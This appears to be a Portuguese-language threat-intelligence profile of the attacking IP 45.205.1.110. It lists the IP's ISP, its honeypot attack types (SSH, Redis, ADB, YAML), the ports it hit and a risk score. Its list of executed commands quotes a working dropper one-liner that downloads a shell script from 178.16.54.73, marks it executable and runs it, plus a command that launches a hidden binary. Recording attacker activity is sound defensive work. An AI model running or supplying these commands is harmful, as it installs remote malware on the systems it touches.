TROYANOSYVIRUS
Ameaca AtivaCRITICO

45.205.1.110

Primeira Deteccao17/03/2026
Ultima Atividade05/04/2026
ISPVpsvault.host Ltd
🎯
13,903
Ataques Totais
🔌
13
Portas
📡
5
Tipos de Ataque
🦠
1
Malware

Geolocalizacao

Pais
🇺🇸 Estados Unidos
Cidade
Desconhecida
ASN
AS215925
ISP
Vpsvault.host Ltd

Tipos de Ataque

ssh_telnet_honeypot
yaml_exploit_honeypot
redis_honeypot
adb_honeypot
tcp_trap

Portas Atacadas

223000555556785679568063797860788080008728900010250

Malware Associado

Comandos Executados

$cd /tmp || cd /data/local/tmp || cd /var/run; rm -f .s; (wget http://178.16.54.73:80/sifFBrHc.sh -O .s 2>/dev/null || curl -sS -o .s http://178.16.54.73:80/sifFBrHc.sh || /bin/busybox wget http://178.16.54.73:80/sifFBrHc.sh -O .s); chmod 777 .s; sh .s3x
$uname -m2x
$echo ALIVE2x
$uname -m 2>/dev/null || getprop ro.product.cpu.abi2x
$chmod 755 /data/local/tmp/.p 2>/dev/null; (/data/local/tmp/.p >/dev/null 2>&1 &)1x

Exposicao Shodan InternetDBShodan

Dados InternetDB, nao em tempo real

Portas
22
CPEs
cpe:/a:openbsd:openssh:8.9p1cpe:/o:canonical:ubuntu_linux

Avaliacao de Risco

85
/100
BaixoMedioAltoCritico